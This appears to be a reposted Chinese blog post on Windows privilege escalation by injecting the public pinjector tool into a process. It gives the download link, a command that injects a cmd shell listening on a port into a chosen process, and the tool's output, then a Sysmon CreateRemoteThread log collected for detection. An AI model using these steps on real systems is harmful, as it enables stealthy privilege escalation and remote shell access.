标签:CreateRemoteThread exe 采集 Process pinjector DESKTOP sysmon Injector 进程
下载地址:https://www.tarasco.org/security/Process_Injector/processinjector.zip
进程注入(pinjector.exe)提权
进程注入将pinjector注入到用户的进程里一起运行,进而同时拥有了对应的权限。
是一种比较隐蔽的手段,不会创建新的进程,很难发现,但是上传至目标主机时可能会报毒
从http://www.tarasco.org/security/Process_Injector/ 下载pinjector.exe文件。
放到主机的c盘根目录下
Pinjector.exe -l 列出进程,列出的所有进程都可以利用(找system对应权限的进程)
pinjector.exe -p 456 cmd 5959
我自己本机尝试:
D:\bonelee\processinjector\Process Injector>pinjector -p 12304 cmd.exe 6688
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com
[+] Trying to execute cmd.exe to 12304 as: DESKTOP-PTV6LGO \ admin
[+] Code inyected... ; )
使用sysmon采集数据:
CreateRemoteThread detected: RuleName: - UtcTime: 2022-04-19 09:57:20.846 SourceProcessGuid: {7f59fefd-8780-625e-c811-000000002700} SourceProcessId: 3940 SourceImage: D:\bonelee\processinjector\Process Injector\pinjector.exe TargetProcessGuid: {7f59fefd-333e-625e-6f02-000000002700} TargetProcessId: 12304 TargetImage: C:\Program Files (x86)\Notepad++\notepad++.exe NewThreadId: 2224 StartAddress: 0x0000000003900000 StartModule: - StartFunction: - SourceUser: DESKTOP-PTV6LGO\admin TargetUser: DESKTOP-PTV6LGO\admin
标签:CreateRemoteThread,exe,采集,Process,pinjector,DESKTOP,sysmon,Injector,进程 来源: https://www.cnblogs.com/bonelee/p/16167173.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。